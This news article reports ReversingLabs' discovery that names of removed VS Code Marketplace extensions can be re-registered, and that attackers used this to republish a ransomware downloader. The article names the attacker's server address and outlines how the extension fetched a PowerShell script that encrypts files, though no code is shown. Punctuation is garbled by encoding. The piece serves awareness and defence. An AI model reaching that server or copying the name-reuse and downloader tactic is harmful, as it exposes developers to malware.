Cybersecurity researchers have uncovered a loophole in Microsoftโs Visual Studio Code (VS Code) Marketplace that enables attackers to reuse deleted extension names, potentially allowing malware to infiltrate developer workflows under the guise of trusted tools.
Researchers at supply chain security firm ReversingLabs (RL) uncovered the issue after tracking a string of malicious extensions called ahbanC.shiba in June. The extension turned out to have the same capability as the previous two extensions flagged earlier this year, ahban.shiba and ahban.cychelloworld, both of which had already been removed from the Marketplace.
That raised a critical question: By Marketplace rules, if VS Code requires all extension names to be unique, how could โshibaโ resurface under a different publisher
How The Attack Works
Like its predecessors, the ahbanC.shiba extension acted as a simple downloader. The extension registered only one command: shiba.aowoo, which fetched a PowerShell script from a remote server (54.85.145.93).
Depending on the operating system, the script encrypted files in a testShiba folder and demanded one Shiba Inu token (a cryptocurrency built on Ethereum) as ransom. Like the earlier versions, however, no wallet address was provided, suggesting the ransomware campaign was still in development.
When the ahban.shiba and ahban.cychelloworld extensions were removed, and researchers assumed their names would be permanently retired. Instead, just weeks later in late March, a new extensionโahbanC.shibaโappeared on the Marketplace carrying the same malicious code as its predecessors. This alarmingly proved that deleted extension names on the VS Code Marketplace werenโt locked away at all, but could be freely reused.
The Hidden Marketplace Loophole
To understand why this happened, RL dug into the Marketplaceโs extension management system. Their investigation revealed that the issue lies in how VS Code handles extension takedowns. Marketplace publishers have two options: unpublish or remove.
- Unpublished extensions disappear from the Marketplace but remain tied to their original name and statistics. They canโt be republished by anyone else. In other words, nobody else can claim the name.
- Removed extensions, however, are completely wiped from the Marketplace. This means their names become available again, allowing anyone โ including malicious actors โ to claim it and publish malicious code under the same name.
In other words, once a legitimate extension is deleted, its trusted name is effectively up for grabs. RL confirmed this by successfully publishing test extensions using names tied to previously deleted packages, including ones with a history of malware, such as Solidity-Ethereum.
A Wider Problem In Open-Source Ecosystems
This isnโt the first time name reuse has been exploited. In early 2023, RL found that the Python Package Index (PyPI) also allowed the reuse of names for deleted packages. One malicious package, termcolour, reappeared years after the original legitimate one was removed.
While PyPI has since implemented restrictions to prevent reuse of names associated with malicious packages, VS Code Marketplace has no such protections in place.
โThe discovery of this loophole exposes a new threat: that the name of any removed extension can be reused, and by anyone. That means that if some legitimate and very popular extension is removed, its name is up for grabs,โ wrote Lucija Valenti, Software Threat Researcher at ReversingLabs, in a blog post.
What Developers Can Do
While Microsoft has yet to announce a fix for the Marketplace loophole, security experts stress that developers must remain vigilant. They recommend carefully vetting extensions before installation, even if the names look familiar, and verifying publisher accounts rather than relying on extension names alone.
Further, continuous monitoring of dependencies with security tools that can detect malicious packages is also advised. Additionally, developers can make use of platforms that offer free risk assessments across multiple repositories, including the VS Code Marketplace.ย
โThe lesson to be learned from this campaign is that itโs important to remember that many dangers are lurking on VS Code Marketplace and other open-source repositories. It is essential for developers and users of these platforms to be mindful and aware of what is being included in the development cycle,โ Valenti concluded.
